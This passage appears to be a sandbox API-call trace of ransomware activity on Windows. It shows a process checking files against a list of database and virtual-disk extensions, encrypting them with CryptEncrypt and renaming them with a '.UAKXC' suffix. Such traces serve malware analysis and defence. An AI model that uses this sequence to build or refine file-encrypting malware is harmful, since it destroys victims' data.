(lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ib") returned 0x0 [0154.053] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".idb") returned 0x0 [0154.053] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ihx") returned 0x0 [0154.053] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".itdb") returned 0x0 [0154.053] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".itw") returned 0x0 [0154.053] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".jet") returned 0x0 [0154.053] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".jtx") returned 0x0 [0154.053] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".kdb") returned 0x0 [0154.053] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".kexi") returned 0x0 [0154.053] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".kexic") returned 0x0 [0154.053] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".kexis") returned 0x0 [0154.053] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".lgc") returned 0x0 [0154.053] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".lwx") returned 0x0 [0154.053] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".maf") returned 0x0 [0154.053] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".maq") returned 0x0 [0154.054] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mar") returned 0x0 [0154.054] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mas") returned 0x0 [0154.054] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mav") returned 0x0 [0154.054] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mdb") returned 0x0 [0154.054] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mdf") returned 0x0 [0154.054] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mpd") returned 0x0 [0154.054] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mrg") returned 0x0 [0154.054] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mud") returned 0x0 [0154.054] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mwb") returned 0x0 [0154.054] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".myd") returned 0x0 [0154.054] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ndf") returned 0x0 [0154.054] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".nnt") returned 0x0 [0154.054] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".nrmlib") returned 0x0 [0154.054] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ns2") returned 0x0 [0154.054] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ns3") returned 0x0 [0154.054] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ns4") returned 0x0 [0154.054] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".nsf") returned 0x0 [0154.054] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".nv") returned 0x0 [0154.054] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".nv2") returned 0x0 [0154.055] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".nwdb") returned 0x0 [0154.055] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".nyf") returned 0x0 [0154.055] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".odb") returned 0x0 [0154.055] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".oqy") returned 0x0 [0154.055] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".orx") returned 0x0 [0154.055] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".owc") returned 0x0 [0154.055] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".p96") returned 0x0 [0154.055] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".p97") returned 0x0 [0154.055] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".pan") returned 0x0 [0154.055] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".pdb") returned 0x0 [0154.055] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".pdm") returned 0x0 [0154.055] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".pnz") returned 0x0 [0154.055] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".qry") returned 0x0 [0154.055] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".qvd") returned 0x0 [0154.055] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".rbf") returned 0x0 [0154.055] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".rctd") returned 0x0 [0154.055] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".rod") returned 0x0 [0154.055] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".rodx") returned 0x0 [0154.055] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".rpd") returned 0x0 [0154.055] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".rsd") returned 0x0 [0154.056] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sas7bdat") returned 0x0 [0154.056] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sbf") returned 0x0 [0154.056] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".scx") returned 0x0 [0154.056] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sdb") returned 0x0 [0154.056] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sdc") returned 0x0 [0154.056] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sdf") returned 0x0 [0154.056] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sis") returned 0x0 [0154.056] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".spq") returned 0x0 [0154.056] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sql") returned 0x0 [0154.056] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sqlite") returned 0x0 [0154.056] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sqlite3") returned 0x0 [0154.056] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sqlitedb") returned 0x0 [0154.056] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".te") returned 0x0 [0154.056] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".temx") returned 0x0 [0154.056] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".tmd") returned 0x0 [0154.056] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".tps") returned 0x0 [0154.056] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".trc") returned 0x0 [0154.056] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".trm") returned 0x0 [0154.056] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".udb") returned 0x0 [0154.056] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".udl") returned 0x0 [0154.057] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".usr") returned 0x0 [0154.057] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".v12") returned 0x0 [0154.057] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vis") returned 0x0 [0154.057] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vpd") returned 0x0 [0154.057] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vvv") returned 0x0 [0154.057] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".wdb") returned 0x0 [0154.057] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".wmdb") returned 0x0 [0154.057] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".wrk") returned 0x0 [0154.057] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".xdb") returned 0x0 [0154.057] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".xld") returned 0x0 [0154.057] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".xmlff") returned 0x0 [0154.057] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".abcddb") returned 0x0 [0154.057] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".abs") returned 0x0 [0154.057] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".abx") returned 0x0 [0154.057] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".accdw") returned 0x0 [0154.057] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".adn") returned 0x0 [0154.057] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".db2") returned 0x0 [0154.058] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fm5") returned 0x0 [0154.058] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".hjt") returned 0x0 [0154.058] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".icg") returned 0x0 [0154.058] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".icr") returned 0x0 [0154.058] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".kdb") returned 0x0 [0154.058] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".lut") returned 0x0 [0154.058] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".maw") returned 0x0 [0154.058] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mdn") returned 0x0 [0154.058] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mdt") returned 0x0 [0154.058] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vdi") returned 0x0 [0154.058] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vhd") returned 0x0 [0154.058] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vmdk") returned 0x0 [0154.058] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".pvm") returned 0x0 [0154.058] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vmem") returned 0x0 [0154.058] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vmsn") returned 0x0 [0154.058] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vmsd") returned 0x0 [0154.058] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".nvram") returned 0x0 [0154.058] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vmx") returned 0x0 [0154.059] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".raw") returned 0x0 [0154.059] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".qcow2") returned 0x0 [0154.059] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".subvol") returned 0x0 [0154.059] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".bin") returned 0x0 [0154.059] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vsv") returned 0x0 [0154.059] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".avhd") returned 0x0 [0154.059] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vmrs") returned 0x0 [0154.059] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vhdx") returned 0x0 [0154.059] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".avdx") returned 0x0 [0154.059] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vmcx") returned 0x0 [0154.059] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".iso") returned 0x0 [0154.059] SetFilePointerEx (in: hFile=0x6f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0154.059] WriteFile (in: hFile=0x6f0, lpBuffer=0x397fd70*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x397fc78, lpOverlapped=0x0 | out: lpBuffer=0x397fd70*, lpNumberOfBytesWritten=0x397fc78*=0x20c, lpOverlapped=0x0) returned 1 [0154.156] WriteFile (in: hFile=0x6f0, lpBuffer=0x397fc80*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x397fc7c, lpOverlapped=0x0 | out: lpBuffer=0x397fc80*, lpNumberOfBytesWritten=0x397fc7c*=0xa, lpOverlapped=0x0) returned 1 [0154.156] SetEndOfFile (hFile=0x6f0) returned 1 [0154.156] SetFilePointerEx (in: hFile=0x6f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0154.156] ReadFile (in: hFile=0x6f0, lpBuffer=0x4b20000, nNumberOfBytesToRead=0x106f, lpNumberOfBytesRead=0x397fc88, lpOverlapped=0x0 | out: lpBuffer=0x4b20000*, lpNumberOfBytesRead=0x397fc88*=0x106f, lpOverlapped=0x0) returned 1 [0154.300] SetFilePointerEx (in: hFile=0x6f0, liDistanceToMove=0xffffef91, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0154.300] WriteFile (in: hFile=0x6f0, lpBuffer=0x4b20000*, nNumberOfBytesToWrite=0x106f, lpNumberOfBytesWritten=0x397fc44, lpOverlapped=0x0 | out: lpBuffer=0x4b20000*, lpNumberOfBytesWritten=0x397fc44*=0x106f, lpOverlapped=0x0) returned 1 [0154.300] CloseHandle (hObject=0x6f0) returned 1 [0154.307] GetProcessHeap () returned 0xea0000 [0154.307] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x7fd7) returned 0x77920d0 [0154.307] lstrcpyW (in: lpString1=0x77920d0, lpString2="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml" [0154.307] lstrcatW (in: lpString1="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpString2=".UAKXC" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml.UAKXC") returned="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml.UAKXC" [0154.307] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml.UAKXC" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml.uakxc")) returned 1 [0154.308] GetProcessHeap () returned 0xea0000 [0154.308] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x77920d0 | out: hHeap=0xea0000) returned 1 [0154.308] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef5ab8 | out: hHeap=0xea0000) returned 1 [0154.308] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef3078 | out: hHeap=0xea0000) returned 1 [0154.308] CryptGenRandom (in: hProv=0xecf568, dwLen=0x20, pbBuffer=0x397fd50 | out: pbBuffer=0x397fd50) returned 1 [0154.308] CryptGenRandom (in: hProv=0xecf568, dwLen=0x8, pbBuffer=0x397fd48 | out: pbBuffer=0x397fd48) returned 1 [0154.308] CryptEncrypt (in: hKey=0xecf820, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x397fd70*, pdwDataLen=0x397fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x397fd70*, pdwDataLen=0x397fc8c*=0x200) returned 1 [0154.309] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0154.310] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6f0 [0154.310] GetLastError () returned 0x0 [0154.310] GetFileSizeEx (in: hFile=0x6f0, lpFileSize=0x397fc88 | out: lpFileSize=0x397fc88*=2424) returned 1 [0154.310] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".4dd") returned 0x0 [0154.310] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".4dl") returned 0x0 [0154.310] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".accdb") returned 0x0 [0154.310] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".accdc") returned 0x0 [0154.310] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".accde") returned 0x0 [0154.310] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".accdr") returned 0x0 [0154.310] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".accdt") returned 0x0 [0154.310] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".accft") returned 0x0 [0154.310] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".adb") returned 0x0 [0154.310] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ade") returned 0x0 [0154.310] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".adf") returned 0x0 [0154.310] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".adp") returned 0x0 [0154.311] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".arc") returned 0x0 [0154.311] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ora") returned 0x0 [0154.311] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".alf") returned 0x0 [0154.311] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ask") returned 0x0 [0154.311] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".btr") returned 0x0 [0154.311] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".bdf") returned 0x0 [0154.311] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".cat") returned 0x0 [0154.311] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".cdb") returned 0x0 [0154.311] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ckp") returned 0x0 [0154.311] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".cma") returned 0x0 [0154.311] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", 